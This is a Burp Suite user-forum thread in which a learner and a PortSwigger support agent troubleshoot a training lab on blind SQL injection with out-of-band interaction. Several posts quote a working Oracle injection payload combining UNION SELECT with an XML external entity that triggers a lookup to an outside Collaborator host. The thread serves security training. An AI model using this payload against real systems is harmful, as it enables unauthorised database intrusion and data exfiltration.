Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Issues with 'Blind SQL injection with out-of-band interaction' Lab

Shervin | Last updated: Feb 02, 2022 09:36PM UTC

Hello PortSwigger Team, It seems that the recommended solution is not working correctly for me. I do currently have the professional edition of the Burp Suite and I am replacing the 'YOUR-COLLABORATOR-ID.burpcollaborator.net' portion of the injection string with the generated URL provided by the Burp Collaborator client feature however when I poll the Collaborator client for recent interactions, none show up. I am simply refreshing the main page of the lab website, intercepting the request, and concatenating the injection string with the value of the 'trackingId' cookie as directed in the solution, yet no DNS lookup appears to be triggered.

Ben, PortSwigger Agent | Last updated: Feb 03, 2022 09:00AM UTC

Hi Shervin, In the first instance, just to confirm that you have the requisite connectivity in place, if you perform a collaborator health check (via the Help -> Embedded browser health check menu item) are all of the tests succeeding? I have just run through this lab and was able to solve it using the solution provided so it does appear to be working as expected. Are you able to provide us with some details of the steps that you are taking to try and solve this (the payload that you are entering as part of the TrackingID cookie would be useful). If it helps to provide screenshots of your process then please feel free to send these to us via email at support@portswigger.net.

Shervin | Last updated: Feb 03, 2022 03:06PM UTC

I sent a screenshot of the embedded browser health check results to the support email provided. All tests appear to be successful. Here's a sample payload that I've just tried as value for the 'TrackingId' cookie. ORJXFYvqinVDE32z'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//rlgg7u7rcc18mizfgm85gb6spjvcj1.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Shervin | Last updated: Feb 03, 2022 03:06PM UTC

I sent a screenshot of the embedded browser health check results to the support email provided. All tests appear to be successful. Here's a sample payload that I've just tried as value for the 'TrackingId' cookie. ORJXFYvqinVDE32z'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//rlgg7u7rcc18mizfgm85gb6spjvcj1.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Ben, PortSwigger Agent | Last updated: Feb 03, 2022 06:14PM UTC

Hi Shervin, Apologies - I have mistyped in my original answer. I meant for you to check the health of your connection to the public Collaborator server (this can be carried out via Project options -> Misc -> Burp Collaborator Server -> Run health check). Are you able to run this and just double check the connectivity is fine? Just to clarify, you are entering that particular payload in the form below i.e. you are appending the payload after TrackingID= : TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//YOUR-COLLABORATOR-ID.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--. Apologies once again for the confusion.

Shervin | Last updated: Feb 03, 2022 08:48PM UTC

Alright it appears that utilizing the repeater and manually inserting the injection string in the request field as oppose to modifying the request cookie value from the Inspector sub-tab seems to do the trick. Appears to be that the string was being encoded in a particular way when I was utilizing the Inspector sub-tab. Also, result of the health check for the default burp collaborator server was that all tests ran successfully except for the 'Server SMTP connection on port 25'. Anyways, shouldn't be a problem for now. Thanks for your help.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.